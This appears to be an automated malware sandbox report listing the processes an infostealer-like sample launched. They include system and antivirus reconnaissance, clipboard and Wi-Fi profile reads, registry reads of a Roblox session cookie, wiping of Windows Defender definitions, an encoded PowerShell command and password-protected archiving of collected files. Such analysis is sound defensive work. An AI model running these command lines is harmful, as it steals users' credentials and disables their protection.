                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:34
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6bfe40000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6bfe40000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:09:24:11
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:50
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff6bfe40000
                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:51
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:52
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:systeminfo
                                                                                                                                                                    Imagebase:0x7ff77bac0000
                                                                                                                                                                    File size:110'080 bytes
                                                                                                                                                                    MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:53
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-Clipboard
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:54
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:55
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:netsh wlan show profile
                                                                                                                                                                    Imagebase:0x7ff68b0c0000
                                                                                                                                                                    File size:96'768 bytes
                                                                                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:56
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:57
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
                                                                                                                                                                    Imagebase:0x7ff7486c0000
                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:58
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:59
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:60
                                                                                                                                                                    Start time:09:24:15
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                    Imagebase:0x7ff65eca0000
                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:09:24:15
Start date:06/12/2023
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
Imagebase:0x7ff7baf90000
File size:52'744 bytes
MD5 hash:C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:09:24:16
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:09:24:17
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:09:24:17
Start date:06/12/2023
Path:C:\Windows\System32\getmac.exe
Wow64 process (32bit):false
Commandline:getmac
Imagebase:0x7ff60d3f0000
File size:90'112 bytes
MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:09:24:17
Start date:06/12/2023
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff66f690000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff66f690000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:09:24:18
Start date:06/12/2023
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff66f690000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:09:24:19
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:09:24:19
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:09:24:19
Start date:06/12/2023
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff66f690000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:09:24:19
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:77
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:78
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:79
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:80
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:81
                                                                                                                                                                    Start time:09:24:21
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:82
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:83
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:84
                                                                                                                                                                    Start time:09:24:22
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:87
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:88
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
